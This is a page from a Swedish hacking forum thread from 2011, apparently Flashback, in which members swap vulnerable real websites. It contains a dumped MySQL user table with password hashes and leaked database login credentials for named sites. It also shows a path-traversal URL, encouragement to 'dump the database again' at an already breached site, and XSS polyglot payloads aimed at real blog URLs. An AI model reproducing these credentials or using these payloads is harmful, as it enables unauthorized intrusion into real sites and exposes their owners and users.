1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2011-02-02, 18:57
  #2137
uman231
Medlem
uman231s avatar
http://www.troochvetande.se/admin


Inget av större intresse men
Citera
2011-02-02, 21:57
  #2138
svettiglana
Medlem
svettiglanas avatar
http://www.ciklid.org/artregister/ar...hp?ID=198' Många många users...[/quote]

Kod: 
Database:mysql
Table:user

%:ciklid2_se@c1368:5bf83e197a0c9f82
%:ciklid_tst:132c305956b0b226
de-0053:root:2056793f20afbc5f
localhost:ciklid2_se@c1368:5bf83e197a0c9f82
localhost:ciklid_banner:04bc917b5a01cbcd
localhost:ciklid_forum:5c63d7db63d8f6cd
localhost:ciklid_forum_tst:5c63db9563d8fa87
localhost:ciklid_www:5c63d7db63d8f6cd
localhost:ciklidb_se@c1368:19178a2a029fd782
localhost:debian-sys-maint:5a29a94c7bdc793c
localhost:root:2056793f20afbc5f
localhost:www_forum_tst:5c63db9563d8fa87
Citera
2011-02-02, 22:31
  #2139
uman231
Medlem
uman231s avatar
http://halebopjul.se/admin/
Citera
2011-02-03, 04:07
  #2140
CD-skiva
Medlem
CD-skivas avatar
Citat:
Ursprungligen postat av uman231
http://halebopjul.se/admin/
Hur hittade du denna?

http://halebopjul.se/admin/saveimage..../../index.php

mysqlfrontpage.php:
$db=mysql_connect("mydb20.surftown.se:3306", "marktie_magnus", "more2011");
Citera
2011-02-03, 21:37
  #2141
limpwald
Medlem
limpwalds avatar
Citat:
Ursprungligen postat av uman231
http://halebopjul.se/admin/


Bra jobbat!
Citera
2011-02-03, 22:41
  #2142
Gh0sted
Medlem
Gh0steds avatar
Citat:
Ursprungligen postat av Nytt-konto
Frida.se är tillfälligt stängd för underhåll
Öppnar igen inom kort, vänligen återkom vid ett senare tillfälle

"Kära medlemmar!
P.g.a. databasintrång har vi blivit tvugna att återställa allas lösenord. "

Alla gamla hålen ligger fortfarande kvar..

http://www.frida.se/blogg/blogg.php?id=12
Citera
2011-02-03, 22:42
  #2143
uman231
Medlem
uman231s avatar
Citat:
Ursprungligen postat av limpwald
Bra jobbat!
Tråkigt nog ser du ut att vara blockat nu menn :P
Citera
2011-02-04, 10:44
  #2144
t0rsken
Bannlyst
Citat:
Ursprungligen postat av Gh0sted
"Kära medlemmar!
P.g.a. databasintrång har vi blivit tvugna att återställa allas lösenord. "

Alla gamla hålen ligger fortfarande kvar..

http://www.frida.se/blogg/blogg.php?id=12

Då är det bara att börja dumpa databasen igen med andra ord?
Citera
2011-02-04, 10:47
  #2145
blurred-
Medlem
blurred-s avatar
http://www.strateg.se/
Citera
2011-02-04, 10:49
  #2146
Gh0sted
Medlem
Gh0steds avatar
Citat:
Ursprungligen postat av t0rsken
Då är det bara att börja dumpa databasen igen med andra ord?

Kör på
Citera
2011-02-05, 15:59
  #2147
Gh0sted
Medlem
Gh0steds avatar
Citat:
Ursprungligen postat av Gh0sted
"Kära medlemmar!
P.g.a. databasintrång har vi blivit tvugna att återställa allas lösenord. "

Alla gamla hålen ligger fortfarande kvar..

http://www.frida.se/blogg/blogg.php?id=12

Sidan är återigen nedstängd, har frida.se hittat denna tråd måntro?
Citera
2011-02-05, 16:29
  #2148
fooztr
Medlem
fooztrs avatar
XSS
Kod: 
http://privatblogg.se/?go=&msg=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://www.sexcapades.privatblogg.se/index.php?go=&ident=397024663&alert=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://www.betty.privatblogg.se/index.php?ident=276346025&alert=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://www.mickla.privatblogg.se/index.php?ident=273008880&alert=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

Har tyvärr inte hittat något hål för sql-injections.
__________________
Senast redigerad av fooztr 2011-02-05 kl. 16:46.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in